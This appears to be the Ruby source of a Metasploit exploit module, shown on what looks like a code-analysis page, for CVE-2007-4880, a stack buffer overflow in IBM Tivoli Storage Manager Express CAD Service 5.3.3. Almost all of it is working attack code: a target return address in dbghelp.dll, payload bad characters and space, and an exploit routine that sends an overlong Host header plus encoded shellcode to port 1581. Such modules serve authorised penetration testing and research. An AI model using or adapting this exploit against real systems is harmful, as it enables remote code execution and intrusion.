modules/exploits/windows/http/ibm_tsm_cad_header.rb from rapid7/metasploit-framework

modules/exploits/windows/http/ibm_tsm_cad_header.rb
Summary

Maintainability

2 hrs
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3).
        By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2007-4880' ],
          [ 'OSVDB', '38161' ],
          [ 'BID', '25743' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 650,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2007-09-24'))

    register_options( [ Opt::RPORT(1581) ])
  end

  def exploit
    connect

    sploit =  "GET /BACLIENT HTTP/1.1\r\n"
    sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190)
    sploit << [target.ret].pack('V') + payload.encoded

    print_status("Trying target %s..." % target.name)

    sock.put(sploit + "\r\n\r\n")

    handler
    disconnect
  end
end